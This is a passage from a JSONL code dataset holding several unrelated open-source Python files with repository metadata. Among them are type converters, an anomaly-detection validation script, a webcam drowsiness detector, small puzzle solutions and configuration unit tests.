HTTPException(status_code=400, detail=\"Path is a file\")\n\n info_list.append(FileInfo(\".\", local_path.stat()))\n\n if local_path != Path(BASE_FILE_PATH):\n info_list.append(FileInfo(\"..\", local_path.parent.stat()))\n\n for i_file in local_path.iterdir():\n info_list.append(FileInfo(i_file.name, i_file.stat()))\n\n return info_list\n\n\nasync def main():\n config = uvicorn.Config(\"main:app\", port=8000, log_level=\"info\")\n server = uvicorn.Server(config)\n await server.serve()\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"yanxiangrong/file-station","sub_path":"Backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30700761000","text":"\"\"\"Built-in converters.\"\"\"\n\nimport collections.abc as collections\nimport enum\nimport functools\nimport inspect\nfrom typing import Any, Callable, Dict, Iterable, List, Mapping, Optional, Sequence, Set, Tuple, TypeVar, cast\n\nfrom . import source, templ, typeinspect\nfrom .converter import ComplexConverterABC, ConversionError, convert_value, has_converter, register_converter\n\nT = TypeVar(\"T\")\n\n\n# <-- converter groups -------------------------------------------------------->\n\n# primitive types which can be called with multiple input types to get the\n# desired type.\n\ndef _register_primitive_converters(converters: Iterable[type]) -> None:\n for conv in converters:\n register_converter(conv)(conv)\n\n\n_register_primitive_converters((\n bool,\n int, float, complex,\n str, bytes,\n))\n\ndel _register_primitive_converters\n\n\n# types which are first converted to a general type (read: interface)\n# and then converted to the real type.\n\ndef _register_container_converters(converters: Iterable[Tuple[Tuple[type, ...], type]]) -> None:\n def _make_converter(cls: Callable, base_type: type):\n @functools.wraps(cls)\n def converter(val: Any):\n val = convert_value(val, base_type)\n if not isinstance(val, cls):\n val = cls(val)\n\n return val\n\n return converter\n\n for convs, base in converters:\n register_converter(*convs)(_make_converter(\n cast(Callable, convs[-1]),\n base,\n ))\n\n\n_register_container_converters((\n ((Tuple, tuple), Iterable),\n ((List, list), Iterable),\n ((Set, set), Iterable),\n\n ((Dict, dict), Mapping),\n))\n\ndel _register_container_converters\n\n\n# <-- simple converters ------------------------------------------------------->\n\n@register_converter(None, type(None))\ndef none_converter(_: Any) -> None:\n \"\"\"Converts all values to `None`.\"\"\"\n return None\n\n\n@register_converter(Any)\ndef any_convert(val: Any) -> Any:\n \"\"\"Returns value as is.\"\"\"\n return val\n\n\n@register_converter(Iterable, collections.Iterable)\ndef iterable_converter(value: Any) -> Iterable:\n \"\"\"Converts the value to an iterable.\n\n Non-iterable values are wrapped in a tuple.\n\n Even though strings are iterable, this converter does not treat them as such\n to be consistent with the user's expectations.\n\n The same is true for mappings which is converted to an iterable of key,\n value tuples instead of just the keys.\n \"\"\"\n if isinstance(value, Mapping):\n return value.items()\n\n if isinstance(value, Iterable) and not isinstance(value, (str,)):\n return value\n else:\n # yes it looks weird, but this is a tuple\n return value,\n\n\n@register_converter(Mapping, collections.Mapping)\ndef mapping_converter(value: Any) -> Mapping:\n \"\"\"Converts the value to a mapping,\n\n Sequences are interpreted as a mapping from index to value.\n All other value types raise a `ConversionError`.\n \"\"\"\n if isinstance(value, Mapping):\n return value\n elif isinstance(value, Sequence):\n return dict(enumerate(value))\n else:\n raise ConversionError(f\"can't convert {value!r} to a Mapping\")\n\n\n# <-- complex converters ------------------------------------------------------>\n\n@register_converter()\nclass UnionConverter(ComplexConverterABC):\n \"\"\"Converter for union types.\n\n First checks if value is already in the union and if it's not it then\n tries to convert to the values from first to last.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n return typeinspect.is_union(target) and all(map(has_converter, typeinspect.get_type_args(target)))\n\n def convert(self, value: Any, target: type) -> Any:\n if typeinspect.has_type(value, target):\n return value\n\n types = typeinspect.get_type_args(target)\n last_exception: Optional[Exception] = None\n\n for typ in types:\n try:\n return convert_value(value, typ)\n except ConversionError as e:\n if last_exception is not None:\n last_exception.__cause__ = e\n\n last_exception = e\n\n raise last_exception\n\n\n@register_converter()\nclass TupleConverter(ComplexConverterABC):\n \"\"\"Converter for typed tuples.\n\n The input value is first converted to a collection, if the tuple\n type has a fixed length the input must match that, otherwise any\n length is accepted.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n is_tuple = typeinspect.is_tuple(target) \\\n and not typeinspect.has_free_parameters(target)\n\n if not is_tuple:\n return False\n\n container_type = typeinspect.get_origin(target)\n item_types = typeinspect.resolve_tuple(target)[0]\n return has_converter(container_type) and all(map(has_converter, item_types))\n\n def convert(self, value: Any, target: type) -> tuple:\n # convert to a collection\n values = convert_value(value, list)\n\n types, n = typeinspect.resolve_tuple(target)\n if n is None:\n typ = types[0]\n return tuple(convert_value(val, typ) for val in values)\n elif n != len(values):\n raise ConversionError(f\"Can't convert {values!r} to {n}-tuple, lengths don't match\")\n else:\n return tuple(convert_value(val, typ) for val, typ in zip(values, types))\n\n\n@register_converter()\nclass IterableConverter(ComplexConverterABC):\n \"\"\"Converts the value to a typed iterable.\n\n The value is first converted to an untyped `Iterable`.\n All items are converted to the item type and gathered in a `list`.\n The list is then converted to the container type.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n is_iterable = typeinspect.is_generic_iterable(target) \\\n and not typeinspect.has_free_parameters(target) \\\n and not typeinspect.is_tuple(target) \\\n and not typeinspect.is_generic_mapping(target)\n\n if not is_iterable:\n return False\n\n container_type = typeinspect.get_origin(target)\n item_type = typeinspect.get_type_args(target)[0]\n return has_converter(container_type) and has_converter(item_type)\n\n def convert(self, value: Any, target: type) -> Iterable[T]:\n container_type = typeinspect.get_origin(target)\n item_type = typeinspect.get_type_args(target)[0]\n\n final_list = []\n\n it = convert_value(value, Iterable)\n for i, sub_value in enumerate(it):\n try:\n v = convert_value(sub_value, item_type)\n except ConversionError as e:\n raise ConversionError(f\"couldn't convert value at index {i} ({sub_value!r}) \"\n f\"to {typeinspect.friendly_name(item_type)}\") from e\n\n final_list.append(v)\n\n if container_type is not None:\n final_list = convert_value(final_list, container_type, exclude_converters={self})\n\n return final_list\n\n\n@register_converter()\nclass MappingConverter(ComplexConverterABC):\n \"\"\"Converts the value to a mapping.\n\n The value is first converted to an untyped `Mapping`.\n A `dict` is which maps the keys converted to the key type to\n the values converted to the value type.\n This dict is then converted to the container type.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n is_mapping = typeinspect.is_generic_mapping(target) \\\n and not typeinspect.has_free_parameters(target)\n if not is_mapping:\n return False\n\n container_type = typeinspect.get_origin(target)\n key_type, value_type = typeinspect.get_type_args(target)\n\n return has_converter(container_type) \\\n and has_converter(key_type) \\\n and has_converter(value_type)\n\n def convert(self, value: Any, target: type) -> Iterable[T]:\n container_type = typeinspect.get_origin(target)\n key_type, value_type = typeinspect.get_type_args(target)\n\n final_map = {}\n\n mapping = convert_value(value, Mapping)\n for key, value in mapping.items():\n try:\n k = convert_value(key, key_type)\n except ConversionError as e:\n raise ConversionError(f\"couldn't convert key {key!r} to \"\n f\"{typeinspect.friendly_name(key_type)}\") from e\n\n try:\n v = convert_value(value, value_type)\n except ConversionError as e:\n raise ConversionError(f\"couldn't convert value of {key!r} ({value!r}) \"\n f\"to {typeinspect.friendly_name(value_type)}\") from e\n\n final_map[k] = v\n\n if container_type is not None:\n final_map = convert_value(final_map, container_type, exclude_converters={self})\n\n return final_map\n\n\n@register_converter()\nclass TemplateConverter(ComplexConverterABC):\n \"\"\"Converter which converts the value to a template-like object.\n\n This converter exists mainly for templates used in containers like\n `List[MyTemplate]` or `Dict[str, MyTemplate]`.\n\n It also requires that the value is a complete template object. This\n is why it shouldn't be used by a source.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n return templ.is_template_like(target)\n\n def convert(self, value: Any, target: type) -> Any:\n value_map = convert_value(value, Mapping)\n\n fields = templ.fields(target)\n obj = templ.create_object_from_template(target)\n source.load_fields_values(obj, fields, value_map)\n templ.ensure_complete(obj, target)\n\n return obj\n\n\n@register_converter()\nclass EnumConverter(ComplexConverterABC):\n \"\"\"Converter for converting values to `enum.Enum`.\n\n The converter prefers a perfect name match, if that fails it tries\n to use a perfect value match.\n If that also fails and the value is a string, the first case-insensitive\n match on either the name or the value of a filed is returned.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n return inspect.isclass(target) and issubclass(target, enum.Enum)\n\n def convert(self, value: Any, target: enum.EnumMeta) -> enum.Enum:\n try:\n return target[value]\n except KeyError:\n pass\n\n try:\n return target(value)\n except (ValueError, TypeError):\n pass\n\n if isinstance(value, str):\n value_lower = value.lower()\n for enum_field in target:\n enum_field = cast(enum.Enum, enum_field)\n\n if value_lower == enum_field.name.lower():\n return enum_field\n\n field_val = enum_field.value\n if isinstance(field_val, str) and field_val.lower() == value_lower:\n return enum_field\n\n raise ConversionError(f\"{value!r} isn't in enum {typeinspect.friendly_name(target)}\")\n","repo_name":"gieseladev/konfi","sub_path":"konfi/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":11043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29167845734","text":"import argparse, random, os, random, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport pandas as pd\nimport numpy as np\nimport statsmodels.stats.api as sms\n\nfrom omegaconf import OmegaConf\nfrom sklearn.metrics import confusion_matrix\nfrom tqdm import tqdm\nfrom datetime import datetime\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom model import VAE, customLoss\nimport utils\nimport tracin_utils\nfrom datasets import BaselineDataset\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-config', \n default=None, \n type=str, \n help='path to config file')\n\n opts = parser.parse_args()\n\n args = OmegaConf.load(opts.config)\n\n if not torch.cuda.is_available():\n args.device = 'cpu'\n else:\n args.device = 'cuda'\n\n device = torch.device(args.device)\n date_file = datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n\n Datasets = BaselineDataset(dataset=args.dataset, root_dir=args.data_dir,\n model_name=args.vae.model_name, mode='val')\n dataset = Datasets.get_dataset()\n\n args.model_name = 'n_epoch_{}__btchsz_{}__hsize_{}_{}__ldim_{}__e_layers_{}' + \\\n '__d_layers_{}__opt_{}__lr_{}__wdecay_{}__eps_{}__momentum_{}__' + \\\n 'n_tracin_lyrs_{}__stepszCP_{}__m_{}__l_{}'\n args.model_name = args.model_name.format(args.vae.n_epochs,\n args.vae.batch_size,\n args.vae.hidden_sizes[0],\n args.vae.hidden_sizes[1],\n args.vae.latent_dim, \n args.vae.n_encoder_layers,\n args.vae.n_decoder_layers,\n args.vae.optimizer,\n args.vae.lr,\n args.vae.weight_decay,\n args.vae.eps,\n args.vae.momentum,\n args.vae.tracin_layers,\n args.vae.step_size_CP,\n args.vae.n_random_train_sample,\n args.vae.reconstruct_num)\n\n args.model_dir = os.path.join(args.model_dir, args.dataset, args.model_name)\n\n f1_scores_r_error = []\n precision_r_error = []\n recall_r_error= []\n ap_score_r_error = []\n auc_score_r_error = []\n\n f1_scores_influence = []\n precision_influence = []\n recall_influence = []\n ap_score_influence = []\n auc_score_influence = []\n\n f1_scores_aug_r_error = []\n precision_aug_r_error = []\n recall_aug_r_error = []\n ap_score_aug_r_error = []\n auc_score_aug_r_error = []\n\n for iter in range(args.n_iters):\n\n seed = args.seed + iter\n print('Seed: {}'.format(seed))\n\n # Set seed for reproducibility\n random.seed(seed)\n torch.manual_seed(seed)\n np.random.seed(seed)\n torch.backends.cudnn.deterministic = True\n\n dataloader = DataLoader(dataset, batch_size=args.vae.batch_size, num_workers=0,\n shuffle=True, drop_last=False)\n\n model = VAE(D_in=dataset.num_features(), hidden_sizes=args.vae.hidden_sizes, \n latent_dim=args.vae.latent_dim, n_encoder_layers=args.vae.n_encoder_layers,\n n_decoder_layers=args.vae.n_decoder_layers)\n\n optimizer = utils.get_optimizer(model.parameters(), args.vae.optimizer, args.vae)\n\n epoch = 0\n loss_mse = customLoss(reduction='none')\n self_score = pd.DataFrame({'influence':np.zeros(len(dataset.val_labels)),\n 'labels':dataset.val_labels})\n\n model, _, _ = utils.load_model(model, optimizer, None, args, args.vae.n_epochs, seed, device, verbose=False)\n model = model.to(device)\n \n indexs = []\n scores = []\n \n\n while epoch < args.vae.n_epochs:\n\n epoch += args.vae.step_size_CP\n model, _, _ = utils.load_model(model, optimizer, None, args, epoch, seed, device, verbose=False)\n\n model.to(device)\n print('Computing Influence for CP:{}/{}'.format(epoch, args.vae.n_epochs))\n\n ## selecting n_random_train_sample random normal samples in the training set to evaluate its impact on the val samples\n rand_train_batch = torch.tensor(dataset.train_data[np.random.choice(dataset.train_data.shape[0],\n args.vae.n_random_train_sample,\n replace=False),:])\n\n rand_train_batch = rand_train_batch.to(device)\n \n grad_x_train = tracin_utils.grad_batch(rand_train_batch, args.vae.tracin_layers, \n model, loss_mse, \n args.vae.model_name,\n reconstruct_num=args.vae.reconstruct_num)\n \n grad_x_train = [torch.stack(x) for x in list(zip(*grad_x_train))]\n\n for batchs in tqdm(dataloader):\n\n batch, index, _ = batchs\n batch = batch.to(device)\n\n grad_x_val = tracin_utils.grad_batch(batch, args.vae.tracin_layers, \n model, loss_mse, \n args.vae.model_name,\n reconstruct_num=args.vae.reconstruct_num)\n \n grad_x_val = [torch.stack(x) for x in list(zip(*grad_x_val))]\n\n grad_dot = [torch.mean(torch.mm(torch.flatten(val_grad, start_dim=1),\n torch.flatten(train_grad, start_dim=1).transpose(0,1)), dim=1) \n for val_grad, train_grad in zip(grad_x_val, grad_x_train)]\n\n grad_dot_product = torch.mean(torch.stack(grad_dot), dim=0).detach().cpu().numpy()\n\n # add gradient dot product to influences\n self_score.loc[index,\"influence\"] += grad_dot_product * args.vae.lr / args.vae.n_random_train_sample\n\n self_score['influence'] = (self_score['influence']-self_score['influence'].mean())/self_score['influence'].std()\n\n # Influence Score\n (f1_score, precision, recall,\n ap_score, auc_score, thresh) = utils.f_score(self_score['influence'],\n self_score['labels'])\n y_pred = (self_score['influence'] >= thresh).astype(int)\n cm = confusion_matrix(self_score['labels'], y_pred)\n tn, fp, fn, tp = cm.ravel()\n\n print(\"Score:\", \"Influence Score only\"\n \"\\n\\tNumber of frauds in validation set:\",\n dataset.val_labels.sum(),\n \"\\n\\tShare of frauds in validation set:\",\n dataset.val_labels.sum() / len(dataset.val_data),\n \"\\n\\tF1-score: \", f1_score,\n \"\\n\\tPrecision: \", precision,\n \"\\n\\tRecall: \", recall,\n \"\\n\\tAverage Precision: \", ap_score,\n \"\\n\\tAUC Score: \", auc_score,\n \"\\n\\tTrue Negative:\", tn,\n \"\\n\\tFalse Positive:\", fp,\n \"\\n\\tFalse Negative:\", fn,\n \"\\n\\tTrue Positive:\", tp)\n\n f1_scores_influence.append(f1_score)\n precision_influence.append(precision)\n recall_influence.append(recall)\n ap_score_influence.append(ap_score)\n auc_score_influence.append(auc_score)\n\n stats_influence = np.array([f1_scores_influence, precision_influence, recall_influence, ap_score_influence, auc_score_influence]).T\n mean_stats_influence = np.mean(stats_influence, axis=0)\n std_stats_influence = np.std(stats_influence, axis=0)\n conf_ic_influence = np.array( [sms.DescrStatsW(x).tconfint_mean() for x in [f1_scores_influence, \n precision_influence, \n recall_influence, \n ap_score_influence, \n auc_score_influence] ] )\n\n\n np.savetxt(os.path.join(args.save_dir, 'stats_{}.txt'.format(date_file)), [args.model_name], fmt=\"%s\")\n with open(os.path.join(args.save_dir, 'stats_{}.txt'.format(date_file)), 'ab') as file:\n file.write(b'Influence Score')\n file.write(b'\\nF1 Precision Recall AUPRC AUROC\\n')\n np.savetxt(file, stats_influence, delimiter=' ', fmt='%1.3f')\n\n np.savetxt(os.path.join(args.save_dir, 'stats_mean_std_{}.txt'.format(date_file)), [args.model_name], fmt=\"%s\")\n with open(os.path.join(args.save_dir, 'stats_mean_std_{}.txt'.format(date_file)), 'ab') as file:\n file.write(b'Influence Score')\n file.write(b'\\nF1 Precision Recall AUPRC AUROC\\n')\n np.savetxt(file, mean_stats_influence[None], delimiter=' ', fmt='%1.3f')\n file.write(b'\\nstd\\n')\n np.savetxt(file, std_stats_influence[None], delimiter=' ', fmt='%1.3f')\n file.write(b'\\nIC\\n')\n np.savetxt(file, conf_ic_influence, delimiter=' ', fmt='%1.3f')\n\n","repo_name":"TracInAD/TracInAD","sub_path":"VAE/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":9761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7494978416","text":"from threading import Thread\r\nimport time\r\nimport numpy as np\r\nimport functions\r\nfrom imutils.video import VideoStream\r\nfrom imutils import face_utils\r\nimport imutils\r\nimport dlib\r\nimport cv2\r\nimport argparse\r\n\r\n\r\nap = argparse.ArgumentParser()\r\nap.add_argument(\"-p\", \"--shape-predictor\", required=True,\r\n\thelp=\"Enter the path to the shape predictor.\")\r\nap.add_argument(\"-a\", \"--alarm\", type=str, default=\"\",\r\n\thelp=\"Enter the path to the alarm file.\")\r\nap.add_argument(\"-w\", \"--webcam\", type=int, default=0,\r\n\thelp=\"Webcam (can change it to an external webcam)\")\r\nargs = vars(ap.parse_args())\r\n\r\n'''\r\ndef visualize_facial_landmarks(image, shape, colors=None, alpha=0.75):\r\n\toverlay = image.copy()\r\n\toutput = image.copy()\r\n\tif colors is None:\r\n\t\tcolors = [(19, 199, 109), (79, 76, 240), (230, 159, 23),\r\n\t\t\t(168, 100, 168), (158, 163, 32),\r\n\t\t\t(163, 38, 32), (180, 42, 220)]\r\n\tfor (i, name) in enumerate(face_utils.FACIAL_LANDMARKS_IDXS.keys()):\r\n\t\t(j, k) = face_utils.FACIAL_LANDMARKS_IDXS[name]\r\n\t\tpts = shape[j:k]\r\n\t\tif name == \"jaw\":\r\n\t\t\tfor l in range(1, len(pts)):\r\n\t\t\t\tptA = tuple(pts[l - 1])\r\n\t\t\t\tptB = tuple(pts[l])\r\n\t\t\t\tcv2.line(overlay, ptA, ptB, colors[i], 2)\r\n\t\telse:\r\n\t\t\thull = cv2.convexHull(pts)\r\n\t\t\tcv2.drawContours(overlay, [hull], -1, colors[i], -1)\r\n\t\t\t# apply the transparent overlay\r\n\tcv2.addWeighted(overlay, alpha, output, 1 - alpha, 0, output)\r\n\t# return the output image\r\n\treturn output\r\n'''\r\n\r\nthreshold = 0.3\r\nthreshold_frames = 45\r\n\r\n\r\ncount = 0\r\nAl_on = False\r\n\r\n\r\nprint(\"Finding facial predictor!\")\r\ndetector = dlib.get_frontal_face_detector()\r\npredictor = dlib.shape_predictor(args[\"shape_predictor\"])\r\n\r\n\r\n(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\r\n(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\r\n(aStart, bEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"nose\"]\r\n(bStart, aEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"jaw\"]\r\n(xStart, yEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"mouth\"]\r\n\r\nprint(\"Starting Video Stream!\")\r\nvs = VideoStream(src=args[\"webcam\"]).start()\r\ntime.sleep(1.0)\r\n\r\n\r\nwhile True:\r\n\r\n\tframe = vs.read()\r\n\tframe = imutils.resize(frame, width=450)\r\n\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\tsize = frame.shape\r\n\trects = detector(gray, 0)\r\n\r\n\tfor rect in rects:\r\n\r\n\t\tshape = predictor(gray, rect)\r\n\t\tshape = face_utils.shape_to_np(shape)\r\n\t\tnose = shape[aStart:bEnd]\r\n\t\tjaw = shape[bStart:aEnd]\r\n\t\tmouth = shape[xStart:yEnd]\r\n\t\tjawHull = cv2.convexHull(jaw)\r\n\t\tmouthHull = cv2.convexHull(mouth)\r\n\t\tnoseHull = cv2.convexHull(nose)\r\n\t\tleftEye = shape[lStart:lEnd]\r\n\t\trightEye = shape[rStart:rEnd]\r\n\t\tleftEAR = functions.eye_aspect_ratio(leftEye)\r\n\t\trightEAR = functions.eye_aspect_ratio(rightEye)\r\n\r\n\r\n\t\tear = (leftEAR + rightEAR) / 2.0\r\n\r\n\r\n\t\tleftEyeHull = cv2.convexHull(leftEye)\r\n\t\trightEyeHull = cv2.convexHull(rightEye)\r\n\t\tcv2.drawContours(frame, [mouthHull], -1, (0, 255, 0), 1)\r\n\t\tcv2.drawContours(frame, [noseHull], -1, (0, 255, 0), 1)\r\n\t\tcv2.drawContours(frame, [jawHull], -1, (0, 255, 0), 1)\r\n\t\tcv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)\r\n\t\tcv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)\r\n\r\n\t\t#visualize_facial_landmarks(frame, face_utils.FACIAL_LANDMARKS_IDXS)\r\n\r\n\t\tif ear < threshold:\r\n\t\t\tcount += 1\r\n\r\n\r\n\t\t\tif count >= threshold_frames:\r\n\r\n\t\t\t\tif not Al_on:\r\n\t\t\t\t\tAl_on = True\r\n\r\n\r\n\t\t\t\t\tif args[\"alarm\"] != \"\":\r\n\t\t\t\t\t\tt = Thread(target=functions.sound_alarm,\r\n\t\t\t\t\t\t\targs=(args[\"alarm\"],))\r\n\t\t\t\t\t\tt.deamon = True\r\n\t\t\t\t\t\tt.start()\r\n\r\n\r\n\t\t\t\tcv2.putText(frame, \"WAKE UP!\", (10, 30),\r\n\t\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n\r\n\r\n\t\telse:\r\n\t\t\tcount = 0\r\n\t\t\tAl_on = False\r\n\r\n\r\n\t\tcv2.putText(frame, \"EAR: {:.2f}\".format(ear), (300, 30),\r\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n\r\n\r\n\tcv2.imshow(\"Frame\", frame)\r\n\tkey = cv2.waitKey(1) & 0xFF\r\n\r\n\r\n\tif key == ord(\"e\"):\r\n\t\tbreak\r\n\r\ncv2.destroyAllWindows()\r\nvs.stop()","repo_name":"arjunmann73/Drowsiness-Detection-using-Facial-Recognition","sub_path":"drowsy.py","file_name":"drowsy.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25330759890","text":"from __future__ import division\n\nfrom MathPackage.NumberOperations import num2Dig\nfrom Timer import timer\n\ndef is_bouncy(n):\n has_inc, has_dec = False,False\n rightNum = n % 10\n n = n // 10\n while n > 0:\n leftNum = n % 10\n if leftNum > rightNum: has_inc = True\n elif leftNum < rightNum: has_dec = True\n n = n // 10\n rightNum = leftNum\n if has_dec and has_inc: return True\n return False\n\n\ndef bouncy(n):\n digs = num2Dig(n)\n current = 0\n if len(set(digs)) == 1: return True\n sDigs = sorted(digs)\n if sDigs == digs: return False\n sDigs.reverse()\n if sDigs == digs: return False\n return True\n\n@timer\ndef main():\n count = 0\n current = 99\n while count < .99 * current:\n current += 1\n if is_bouncy(current): count += 1\n print(str(current) + \": \" + str(count / current))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"milespossing/projectEuler","sub_path":"Python/Completed/p112.py","file_name":"p112.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8630790569","text":"\"\"\"\nToy method to return an array of nested lists printed out in a snake-like format. Useful list methods included.\n\"\"\"\n\n\ndef snail(array):\n \"\"\"\n Function to return a nested array in snake format, circling from the outside to the inside as 1-dimensional array.\n Args:\n array: nxn array of nested lists (rows, columns)\n\n Returns:\n n**2 long array including the snake formatted original array.\n \"\"\"\n a = []\n # while there are still elements in the array\n while array:\n # get the entire first row\n a.extend(list(array.pop(0)))\n # match the nested list with its counterparts, meaning [[1,2], becomes [[1,3],\n # [3,4]] [2,4]]\n array = list(zip(*array))\n # reverse the list to [[2,4],\n # [1,3]]\n array.reverse()\n return a\n","repo_name":"marcluettecke/programming_challenges","sub_path":"python_scripts/snakeprint.py","file_name":"snakeprint.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72988864107","text":"import os, sys, pdb, shutil, logging, json, re, importlib\nimport unittest as test\nfrom nistoar.testing import *\n\nfrom nistoar.pdr import config\nfrom nistoar.pdr.exceptions import ConfigurationException\n\ndatadir = os.path.join(os.path.dirname(__file__), \"data\")\ntmpd = None\n\ndef setUpModule():\n global tmpd\n ensure_tmpdir()\n tmpd = tmpdir()\n\ndef tearDownModule():\n rmtmpdir()\n\nclass TestConfig(test.TestCase):\n\n def test_load_from_service(self):\n with self.assertRaises(NotImplementedError):\n config.load_from_service(\"goob/dev\")\n\n def test_lookup_config_server(self):\n with self.assertRaises(NotImplementedError):\n config.lookup_config_server(8888)\n\n def test_load_from_file(self):\n cfgfile = os.path.join(datadir, \"config.json\")\n cfg = config.load_from_file(cfgfile)\n\n self.assertIsInstance(cfg, dict)\n self.assertEqual(cfg['working_dir'], \"/pdr/work\")\n\n cfgfile = os.path.join(datadir, \"config.yaml\")\n cfg = config.load_from_file(cfgfile)\n\n self.assertIsInstance(cfg, dict)\n self.assertEqual(cfg['working_dir'], \"/pdr/work\")\n\n def test_resolve_configuration(self):\n cfgfile = os.path.join(datadir, \"config.json\")\n cfg = config.resolve_configuration(cfgfile)\n self.assertEqual(cfg['working_dir'], \"/pdr/work\")\n\n cfgfile = \"file://\" + cfgfile\n cfg = config.resolve_configuration(cfgfile)\n self.assertEqual(cfg['working_dir'], \"/pdr/work\")\n\n cfgfile = \"http://goober.net/gurn.log\"\n with self.assertRaises(NotImplementedError):\n cfg = config.resolve_configuration(cfgfile)\n\n def test_merge_config(self):\n app = {\n \"foo\": \"bar\",\n \"goob\": { \"gurn\": \"cranston\", \"hank\": \"aaron\" },\n \"zub\": \"dub\",\n \"tell\": { \"a\": 1 }\n }\n defc = {\n \"black\": \"blue\",\n \"goob\": { \"gurn\": \"gomer\", \"patty\": \"duke\" },\n \"tell\": 1,\n \"zub\": { \"dub\": 2}\n }\n out = config.merge_config(app, defc)\n self.assertEqual(out['foo'], 'bar')\n self.assertEqual(out['goob'], { 'gurn': 'cranston', \"hank\": \"aaron\",\n 'patty': \"duke\" })\n self.assertEqual(out['zub'], 'dub')\n self.assertEqual(out['tell'], {\"a\": 1})\n\nclass TestLogConfig(test.TestCase):\n\n def resetLogfile(self):\n if config._log_handler:\n self.rootlog.removeHandler(config._log_handler)\n if self.logfile and os.path.exists(self.logfile):\n os.remove(self.logfile)\n self.logfile = None\n\n def setUp(self):\n if not hasattr(self, 'logfile'):\n self.logfile = None\n if not hasattr(self, 'rootlog'):\n self.rootlog = logging.getLogger()\n self.resetLogfile()\n\n def tearDown(self):\n self.resetLogfile()\n\n def test_from_config(self):\n logfile = \"cfgd.log\"\n cfg = {\n 'logdir': tmpd,\n 'logfile': logfile,\n 'loglevel': 'DEBUG'\n }\n\n self.logfile = os.path.join(tmpd, logfile)\n self.assertFalse(os.path.exists(self.logfile))\n\n config.configure_log(config=cfg)\n self.assertEqual(config.global_logdir, tmpd)\n self.assertEqual(config.global_logfile, self.logfile)\n\n self.rootlog.warning('Oops')\n self.assertTrue(os.path.exists(self.logfile))\n with open(self.logfile) as fd:\n words = fd.read()\n self.assertIn(\"Oops\", words)\n \n def test_abs(self):\n self.logfile = os.path.join(tmpd, \"cfgfile.log\")\n cfg = {\n 'logfile': \"goob.log\"\n }\n\n self.assertFalse(os.path.exists(self.logfile))\n config.configure_log(logfile=self.logfile, config=cfg)\n self.rootlog.warning('Oops')\n self.assertTrue(os.path.exists(self.logfile))\n \nclass TestConfigService(test.TestCase):\n \n def test_ctor(self):\n srvc = config.ConfigService(\"https://config.org/oar/\", \"dev\")\n self.assertEqual(srvc._base, \"https://config.org/oar/\")\n self.assertEqual(srvc._prof, \"dev\")\n\n srvc = config.ConfigService(\"https://config.org/oar\")\n self.assertEqual(srvc._base, \"https://config.org/oar/\")\n self.assertIsNone(srvc._prof)\n\n srvc = config.ConfigService(\"https://config.org\")\n self.assertEqual(srvc._base, \"https://config.org/\")\n self.assertIsNone(srvc._prof)\n\n def test_bad_url(self):\n with self.assertRaises(ConfigurationException):\n srvc = config.ConfigService(\"config.org\")\n\n with self.assertRaises(ConfigurationException):\n srvc = config.ConfigService(\"https://\")\n\n def test_url_for(self):\n srvc = config.ConfigService(\"https://config.org/oar/\", \"dev\")\n self.assertEqual(srvc.url_for(\"goob\"), \"https://config.org/oar/goob/dev\")\n self.assertEqual(srvc.url_for(\"goob\", \"dumb\"),\n \"https://config.org/oar/goob/dumb\")\n\n def test_from_env(self):\n try:\n if 'OAR_CONFIG_SERVICE' in os.environ:\n del os.environ['OAR_CONFIG_SERVICE']\n self.assertIsNone(config.ConfigService.from_env())\n \n os.environ['OAR_CONFIG_SERVICE'] = \"https://config.org/oar/\"\n srvc = config.ConfigService.from_env()\n self.assertEqual(srvc._base, \"https://config.org/oar/\")\n self.assertIsNone(srvc._prof)\n \n os.environ['OAR_CONFIG_ENV'] = \"test\"\n srvc = config.ConfigService.from_env()\n self.assertEqual(srvc._base, \"https://config.org/oar/\")\n self.assertEqual(srvc._prof, \"test\")\n finally:\n if 'OAR_CONFIG_SERVICE' in os.environ:\n del os.environ['OAR_CONFIG_SERVICE']\n if 'OAR_CONFIG_ENV' in os.environ:\n del os.environ['OAR_CONFIG_ENV']\n\n def test_cvtarrays(self):\n d = {\n \"a\": {\n \"[1]\": \"ia\",\n \"[5]\": {\n \"ib\": {\n 